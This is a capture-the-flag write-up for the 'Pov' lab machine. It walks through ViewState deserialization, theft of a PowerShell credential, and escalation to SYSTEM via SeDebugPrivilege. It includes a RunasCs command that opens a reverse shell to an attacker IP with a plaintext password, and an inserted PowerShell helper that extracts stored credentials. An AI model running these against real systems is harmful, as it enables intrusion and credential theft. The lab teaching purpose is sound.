WRITE-UP FOR Pov – solved on 02/02/2024
First of all, we do a little scanning and add the host to /etc/hosts.
Looking around the website, we cannot find anything interesting.
It's time to run gobuster for directories and vhosts.
Hurray, we find dev.pov.htb.
After looking around a little, it's time to use Burp Suite. I found that the download function seems intriguing.
Nothing useful on the contact page.
Now we know the page uses ASP.NET version 4.0.30319. Surfing the Internet, I found something useful. Try the links below for more info =)
https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter
Okay, it seems we have to combine the LFI with the VIEWSTATE value: fetch the /web.config file through the LFI as the instructions describe, because that is where the machineKey lives.
Now we have the machineKey. Just try it with ysoserial.net.
https://github.com/pwntester/ysoserial.net?tab=readme-ov-file
Finally, inject the payload into the VIEWSTATE value we found before.
The moment has come: I got the reverse shell as expected.
Looking around the system, I found some credentials in connection.xml.
After some googling, it seems to be a PowerShell credential object. I decrypted it.
https://stackoverflow.com/questions/63639876/powershell-password-decrypt
All right, now we have the credentials for the user alaading.
Now I had nothing left to do. Continuing my search, I found a file called RunasCs. I searched the Internet, and well..., it can help a lot.
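As an added example (my own code, not from the write-up or the linked Stack Overflow answer), this is the decryption step on the target in PowerShell. The file layout it expects is what Export-Clixml writes for a PSCredential; the path and the element names shown in the comment are assumptions based on that format, not copied from the box.

```powershell
# Added example (not from the write-up): recover the cleartext from an Export-Clixml
# credential file such as connection.xml. Such a file looks roughly like:
#   <Obj RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCredential</T>...</TN>
#     <Props><S N="UserName">user</S><SS N="Password">01000000d08c9ddf...</SS></Props></Obj>
# Caveat: the <SS> element is a DPAPI blob bound to the user who exported it, so this only
# succeeds when run as that same user on the same machine (here, the account the web
# shell runs as). Under any other account Import-Clixml fails with
# "Key not valid for use in specified state".

function Get-ClixmlCredential {
    param([Parameter(Mandatory)][string]$Path)   # e.g. .\connection.xml (path is an assumption)
    try {
        $cred = Import-Clixml -Path $Path        # rebuilds the PSCredential, DPAPI-decrypting the SecureString
    } catch {
        throw "Could not import $Path as $env:USERNAME; run this as the user who exported it. ($($_.Exception.Message))"
    }
    [pscustomobject]@{
        UserName = $cred.UserName
        Password = $cred.GetNetworkCredential().Password   # NetworkCredential exposes the SecureString contents
    }
}

# Same thing when only the raw hex from <SS> was copied out of the XML, for instance
# because the file is not a complete PSCredential object.
function ConvertFrom-EncryptedStandardString {
    param([Parameter(Mandatory)][string]$Hex)
    $ss  = ConvertTo-SecureString -String $Hex    # no -Key given: input is a DPAPI "encrypted standard string"
    $ptr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($ss)
    try     { [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr) }
    finally { [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr) }   # do not leave the cleartext in unmanaged memory
}

Get-ClixmlCredential -Path '.\connection.xml'
```

The DPAPI caveat is the practical point: the password is only recoverable from the shell you landed in because that shell runs as the same account that wrote the file. Copying connection.xml to the attacker box and importing it there will not work.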
https://github.com/antonioCoco/RunasCs
Now use the application to get a second reverse shell on port 4444 as the user alaading.
Searching around gave me user.txt, easy as cake!!
Looking at the RunasCs docs, I found that I can get even more privileges by adding --bypass-uac.
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.177:5555 --bypass-uac
Now we have SeDebugPrivilege, which lets us open processes owned by other users, including SYSTEM. Searching the Internet, I found that I can escalate privileges with this =>>>
The idea is to send a payload that gives us a reverse TCP Meterpreter shell via Metasploit.
First, create the payload on the attacker machine (localhost).
Run a Python HTTP server to transfer the payload to the target.
Download the payload from the target machine.
Configure Metasploit to listen on the port.
Connect and get the reverse shell.
I won't write any comments for the next few pictures, so if you don't understand what I'm doing, try this doc at the DLL hijacking section; it's quite similar (just use an executable payload instead of a .dll file).
https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/
ALRIGHT, I'm back. Now we have the reverse shell in Metasploit. To escalate privileges, we migrate into winlogon.exe, which runs as SYSTEM; SeDebugPrivilege is what allows our process to open it.
Use ps to list all running processes.
Find winlogon.exe and migrate using its PID.
Get the shell, and we're done.
Good job!!! See you on another machine, bro.